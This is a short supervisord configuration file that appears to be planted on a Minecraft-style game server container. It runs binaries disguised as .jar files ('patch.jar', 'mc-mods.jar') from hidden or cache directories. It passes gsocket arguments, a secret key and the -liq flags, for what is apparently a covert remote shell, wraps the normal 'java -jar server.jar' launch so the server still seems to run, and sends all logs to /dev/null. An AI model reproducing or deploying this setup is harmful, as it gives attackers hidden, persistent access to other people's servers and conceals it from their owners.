[supervisord]
logfile=/dev/null

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s i3D2a1E2X-5A1f9d9G8h7-5c4A1e9F9d6A3-8a1C5j1g6 -liq"
command=./patch.jar -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./add-on.jar 
stdout_logfile=/dev/null
autorestart = true

# [program:nscli]
# directory=/home/container/libraries/org/xerial/sqlite-jdbc/3.47.0.0/.cache
# command=./mc-mods.jar -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./patch.jar -u ukgm0
# stdout_logfile=/dev/null
# autorestart = true

